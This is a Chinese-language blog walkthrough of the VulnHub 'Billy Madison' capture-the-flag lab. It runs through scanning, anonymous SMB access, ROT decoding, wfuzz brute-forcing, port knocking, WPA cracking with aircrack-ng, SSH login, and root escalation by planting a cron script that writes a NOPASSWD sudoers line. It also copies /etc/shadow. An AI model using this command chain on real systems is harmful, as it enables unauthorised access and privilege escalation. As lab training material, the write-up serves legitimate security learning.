渗透测试系列 — VulnHub–billy

正文:

表示这个ctf是脑洞大开的,直接上教程链接,学到的知识也很多

教程

一.kali工具
arp-scan
masscan
nmap
nikto
nc
firefox
burp suite
wireshark
exiftool
ncrack
aircrack-ng
truecrack
veracrypt
二.
1.arp-scan -l
2.nmap -A -p1-65535 ip
3.masscan -p1-65535 ip –rate 10000
很快
Discovered open port 23/tcp on 192.168.244.151
Discovered open port 2525/tcp on 192.168.244.151
Discovered open port 22/tcp on 192.168.244.151
Discovered open port 139/tcp on 192.168.244.151
Discovered open port 445/tcp on 192.168.244.151
Discovered open port 80/tcp on 192.168.244.151
Discovered open port 69/tcp on 192.168.244.151
4.
nmap -v –script smb-enum-shares.nse -p445 192.168.244.151
Path: C:\home\WeaselLaugh
| Anonymous access: READ/WRITE
smbclient \\\\10.1.1.129\\EricsSecretStuff\\
ls
get ebd.txt
Erics backdoor is currently CLOSED
5.
nmap 23端口出现了这个
23/tcp open telnet?
| fingerprint-strings:
| NULL:
|_ ***** HAHAH! You’re banned for a while, Billy Boy! By the way, I caught you trying to hack my wifi – but the joke’s on you! I don’t use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****I don’t use ROTten passwords like rkfpuzrahngvat anymore
6.
rot-10 。。。。ROT-10具有潜在密钥的密码rkfpuzrahngvat。

#!/usr/bin/python

from string import *
import sys
for n in range (26):
  print translate(sys.argv[1],maketrans(lowercase, lowercase[n:]+lowercase[:n]))

python rot-10.py “rkfpuzrahngvat” >> rot-10.txt
7.wfuzz
然后运用wfuzz
wfuzz -c –hc=404 -z file,rot-10.txt http://192.168.244.151/FUZZ
wfuzz exschmenuating
8.
登陆http://ip/exschmenuating
which including veronica from the famous wordlist file rockyou.txt.
rockyou.txt的字典文件
9.由于veronica为密码的一部分,所以我们
grep ‘veronica’ /usr/share/wordlists/rockyou.txt > pass.lst
wfuzz -c –hc=404 -z file,pass.lst http://192.168.244.151/exschmenuating/FUZZ.cap
拿到3个密码,2个不规范,直接http://192.168.244.151/exschmenuating/012987veronica.cap
10.
下载cap文件后,将cap文件后缀变成为txt
Eric,
Thanks for your message. I tried to download that file but my antivirus blocked it.
Could you just upload it directly to us via FTP? We keep FTP turned off unless someone connects with the “Spanish Armada” combo.
https://www.youtube.com/watch?v=z5YU7JwVy7s(登录不上youtube,本来也是直接看的作者的教程,说什么端口顺序。。)
11.端口顺序,打开21端口
for x in 1466 67 1469 1514 1981 1986 ;do nmap -Pn –host_timeout 201 –max-retries 0 -p Sx 192.168.244.151;done
12.
cap文件里还有
Veronica,
Thanks that will be perfect. Please set me up an account with username of “eric” and password “ericdoesntdrinkhisownpee.”
-Eric
拿到账号密码
13.后面的ftp链接后操作,过后操作
ftp上去
ftp ip
username of “eric” and password “ericdoesntdrinkhisownpee.”
。。。
。。。(这些,windows,ftp怎么链接不上,暂时没有做)
14.
aircrack-ng -w /usr/share/wordlists/rockyou.txt eg-01.cap
KEY FOUND! [ triscuit* ]
ssh eric@10.1.1.129 -p 1974
15.
find / -perm -g=s -perm -u=s -type f -ls 2>/dev/null

  1454477    368 -r-sr-s---   1 root     eric       372922 Aug 20 22:35 /usr/local/share/sgml/donpcgd
  1058032     52 -rwsr-sr-x   1 daemon   daemon      51464 Jan 14  2016 /usr/bin/at

通过检查目标程序/usr/local/share/sgml/donpcgd
/usr/local/share/sgml/donpcgd /etc/shadow /tmp/shadow
16.

eric@BM:~$ touch /tmp/rootme
eric@BM:~$ /usr/local/share/sgml/donpcgd /tmp/rootme /etc/cron.hourly/rootme
#### mknod(/etc/cron.hourly/rootme,81b4,0)
eric@BM:~$ echo -e '#!/bin/bash\necho "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/rootme
eric@BM:~$ chmod +x /etc/cron.hourly/rootme
eric@BM:~$ cat /etc/cron.hourly/rootme

 
2018.7.18

发表评论

电子邮件地址不会被公开。 必填项已用*标注